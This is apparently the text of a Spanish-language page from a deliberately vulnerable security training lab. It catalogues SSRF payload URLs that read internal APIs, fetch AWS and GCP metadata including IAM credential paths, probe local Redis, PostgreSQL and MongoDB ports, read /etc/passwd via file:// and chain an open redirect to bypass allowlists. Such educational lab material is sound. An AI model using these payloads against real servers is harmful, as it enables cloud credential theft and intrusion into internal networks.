El servidor realiza peticiones HTTP a URLs arbitrarias proporcionadas por el usuario, exponiendo servicios internos y metadatos cloud
Leer la API de usuarios interna que no debería ser accesible externamente
/api/lab/ssrf?url=http://localhost:3001/api/usersObtener info del sistema a través del servidor
/api/lab/ssrf?url=http://localhost:3001/api/system-infoAcceder al servicio de metadatos de AWS (169.254.169.254) para obtener credenciales IAM
/api/lab/ssrf?url=http://169.254.169.254/latest/meta-data/Extraer el rol IAM y sus credenciales temporales de acceso
/api/lab/ssrf?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/Metadatos en Google Cloud Platform (requiere header Metadata-Flavor)
/api/lab/ssrf?url=http://metadata.google.internal/computeMetadata/v1/Detectar Redis expuesto en loopback midiendo el tiempo de respuesta
/api/lab/ssrf?url=http://127.0.0.1:6379Detectar base de datos PostgreSQL interna
/api/lab/ssrf?url=http://127.0.0.1:5432Detectar MongoDB sin autenticación
/api/lab/ssrf?url=http://127.0.0.1:27017En servidores mal configurados, file:// permite leer archivos locales
/api/lab/ssrf?url=file:///etc/passwdCombinar SSRF con un Open Redirect para evadir allowlists de dominio
/api/lab/ssrf?url=http://localhost:3001/api/lab/open-redirect?to=http://169.254.169.254/El endpoint acepta cualquier URL en el parámetro ?url= y realiza la petición desde el servidor sin validación. Esto permite a un atacante acceder a servicios internos de la red privada, metadatos de instancias cloud (AWS IMDS, GCP Metadata), bases de datos internas, y en casos extremos leer archivos del sistema con el esquema file://. OWASP A10:2021 — CVSS 9.8.
Esta aplicación es vulnerable por diseño - Solo para propósitos educativos
© 2025 Aitana Security Lab